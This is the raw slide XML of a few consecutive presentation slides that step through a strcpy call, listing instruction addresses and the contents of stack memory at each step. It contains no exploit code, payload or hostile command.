          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048420</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4771233" y="142884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0xbffff698</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121979" y="1729012"/>
            <a:ext cx="278606" cy="45719"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="635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solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946820" y="338066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0xbffff65c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1309157413"/>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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff734</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x2</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xb7e3faf3</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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0x0</a:t>
                      </a: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212</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="49075" y="35704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0xbffff69c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="883178185"/>
              </p:ext>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0xbffff734</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0xbffff65c</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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff698</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="is-IS" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>8048406</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80482d0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483fd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483fe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048400</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048403</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048406</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048409</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048412</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048415</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048420</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4771233" y="1706152"/>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0xbffff698</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121979" y="1729012"/>
            <a:ext cx="278606" cy="45719"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="635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solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946820" y="338066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0xbffff65c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1380901347"/>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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff734</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x2</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xb7e3faf3</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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0x0</a:t>
                      </a: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213</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="49075" y="35704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0xbffff69c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1170852319"/>
              </p:ext>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0xbffff738</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0xbffff65c</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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff698</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="is-IS" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>8048409</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80482d0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483fd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483fe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048400</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048403</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048406</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048409</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048412</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048415</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048420</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>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0xbffff698</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121979" y="1729012"/>
            <a:ext cx="278606" cy="45719"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="635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solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946820" y="338066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0xbffff65c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4771233" y="197371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108545573"/>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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff734</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x2</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xb7e3faf3</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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0x0</a:t>
                      </a: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214</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="49075" y="35704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0xbffff69c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1593992949"/>
              </p:ext>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0xbffff87b</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0xbffff65c</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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff698</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="is-IS" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>804840b</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80482d0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
